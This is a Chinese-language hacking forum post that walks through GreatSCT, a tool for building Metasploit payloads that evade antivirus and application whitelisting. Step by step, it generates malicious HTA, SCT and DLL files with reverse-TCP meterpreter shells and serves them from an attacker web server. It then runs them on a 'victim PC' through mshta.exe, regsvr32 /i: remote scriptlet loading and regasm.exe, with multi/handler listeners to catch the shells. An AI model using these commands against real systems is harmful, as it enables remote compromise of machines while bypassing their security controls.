標題:GreatSct -應用程序白名單bypass工具

taibeihacker

Moderator

0x00 GreatSCT简介​

GreatSCT目前得到了@ConsciousHacker的支持,該項目名為Great SCT(Great Scott)。 Great SCT是一個用於生成應用程序白名單繞過的開源項目。此工具適用於紅隊和藍隊。它是一種用來生成Metasploit payload的工具,可繞過常見的防病毒解決方案和應用程序白名單解決方案。
您可以從這裡下載:https://github.com/GreatSCT/GreatSCT

0x01 安装和使用​

首先必須下載並安裝它才能開始使用Great SCT。運行以下命令從github下載Great SCT,並在安裝時注意其依賴工具。
這有助於通過使用以下工具繞過Applocker策略:
Installutil.exe: 安裝程序工具是一款命令行工具,允許您通過運行安裝程序組件來安裝和卸載特定程序集中的服務器資源。
Msbuild.exe:Microsoft Build Engine是一個用於構建應用程序的平台。這個引擎,也稱為MSBuild。
Mshta.exe:Mshta.exe運行Microsoft HTML應用程序,Windows OS實用程序負責運行HTA(HTML應用程序)文件。我們可以運行JavaScript或Visual的HTML文件。
Regasm.exe:程序集註冊工具讀取程序集內的元數據,並將必要的記錄添加到註冊表中,從而允許COM客戶端透明地創建.NET框架類。
Regsvcs.exe:RegSvcs表示Microsoft .NET遠程註冊表服務,它以.NET服務安裝著稱。
Regsvr32.exe:Regsvr32是一個命令行實用程序,用於在Windows註冊表中註冊和取消註冊OLE控件,例如DLL和ActiveX控件。
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
./setup.sh
下載後,輸入以下命令以獲取幫助:
oseyylknzsd22883.png

use Bypass
1meiwccpbnk22884.png

現在獲取exploit列表類型:
list
npdkajgv5m322885.png

0x02 生成恶意的hta文件​

現在,從有payload列表中,您可以選擇任何目標進行所需的攻擊。但對於這次攻擊,我們將使用:
use mshta/shellcode_inject/base64_migrate.py
ylofdb5bvym22886.png

執行命令後,輸入以下命令:
generate
dqoylffbwqc22887.png

執行generate命令後,它會詢問您要使用哪種方法。因為我們將使用MSFvenom類型1來選擇第一個選項。單擊enter for meterpreter。然後分別提供lhost和lport,即192.168.1.107和4321。
e12ysbcfjeg22888.png

在生成shellcode時,它將要求您為payload提供一個名稱。默認情況下,它將以payload作為名稱。因為我不想輸入任何名字,所以只需按Enter鍵。
lsumf4p2ukc22889.png

現在,創建了兩個文件。一個資源文件和另一個hta文件。
br0lqb3gpb322890.png

首先,在/usr/share/greatsct output/source中通過輸入以下命令啟動python的服務器:
python -m SimpleHTTPServer 80
q355iteqrff22891.png

現在在受害者PC的命令提示符中執行hta文件
mshta.exe http://192.168.1.107/payload.hta
zrec00segfa22892.png

使用資源文件啟動multi/handler。為此,請輸入以下命令:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
qzpe1kjew2322893.png

0x03 生成恶意sct文件​

現在,從payload列表中,您可以選擇任何目標進行所需的攻擊。但對於這次攻擊,我們將使用:
use regsvr32/shellcode_inject/base64_migrate.py
3fubhig1iv122894.png

執行命令後,輸入以下命令:
generate
tc1loepnqg022895.png

然後它會詢問你payload。只需按Enter鍵,它將把Windows/MeterPreter/Reverse_TCP作為默認payload,這就是我們需要的payload。在此之後,我們提供192.168.1.107和給定端口(any),如下圖所示,我們將lport設置為2345。
yfqnwcey30022897.png

在提供詳細信息後,它會詢問您的惡意軟件名稱。默認情況下,它將設置名稱w為payload,以便您可以指定名稱,或者只需按Enter鍵進行默認設置。
k14sfw3vlla22898.png

當你按Enter鍵時,它會生成兩個文件。其中一個是資源文件,另一個是.sct文件。現在在/usr/share/greatsct output/source中啟動python的服務器,方法是輸入:
python -m SimpleHTTPServer 80
hhepwaq4j1a22900.png

現在在受害者PC的運行窗口中執行.sct文件,如下所示
regsvr32.exe /s /u /n /i:http://192.168.1.107/payload.sct
a4o3wus1ddf22901.png

同時,使用資源文件啟動multi/handler。為此,請輸入以下命令:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
dknvubwa44a22903.png

0x04 生成恶意dll文件​

現在,從payload列表中,您可以選擇任何目標進行所需的攻擊。但對於這次攻擊,我們將使用:
use regasm/meterpreter/rev_tcp.py
3gie0nryiwn22904.png

執行命令後,輸入以下:
set lhost 192.168.1.107
generate
zei5sxbkv0a22906.png

在提供詳細信息後,它會詢問您惡意軟件的名稱。默認情況下,它將設置名稱為payload,便您可以指定名稱,或者只需按Enter鍵進行默認設置。
ura1hy121gs22908.png

當您按Enter鍵時,它將生成dll文件
ivlwkaam50b22909.png

現在輸入以下命令啟動/usr/share/greatsct中的python服務器:
python -m SimpleHTTPServer 80
cc2iq3l4zgu22910.png

現在將上面生成的dll文件放入c:\window s\microsoft.net\framework\v4.0.30319\v4.0.30319\中,然後在受害者PC的命令窗口中執行.dll文件,如下所示:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll
30i40m1ldvq22911.png

同時,使用資源文件啟動multi/handler。為此,請輸入以下命令:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
5blb3ajz2bo22912.png
 
返回
上方